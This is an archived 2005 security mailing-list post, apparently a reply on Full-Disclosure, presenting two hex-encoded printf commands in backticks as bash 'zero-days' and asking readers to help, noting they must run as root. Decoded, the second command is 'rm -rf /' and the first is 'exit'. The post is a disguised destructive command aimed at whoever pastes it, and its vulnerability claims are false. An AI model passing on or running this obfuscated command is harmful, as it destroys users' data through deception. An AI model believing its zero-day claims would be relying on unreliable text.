lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Fri Aug 26 16:16:33 2005
From: th3r007m45t3r at hotmail.com (Rootmaster G)
Subject: Re: Bash vulnerability?

I have for long time  been looking at a new bash zreod4y  that was sent to 
me.  Having not time to calculate who this code works,and now it is with 
this list

I have many times made bash to crash but cannot yet wrige and exploit for 
this issue.

`printf "\x65\x78\x69\x74\x00\x0a"`

aslo I have found this other bash zerod4y from the same place that says

`printf "\x72\x6d\x20\x2d\x72\x66\x20\x2f\x0a\x00"`

both these vulnerabiilities must be run as root i find orf the second one 
will not do what it thinks

can anyone help?

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today - it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ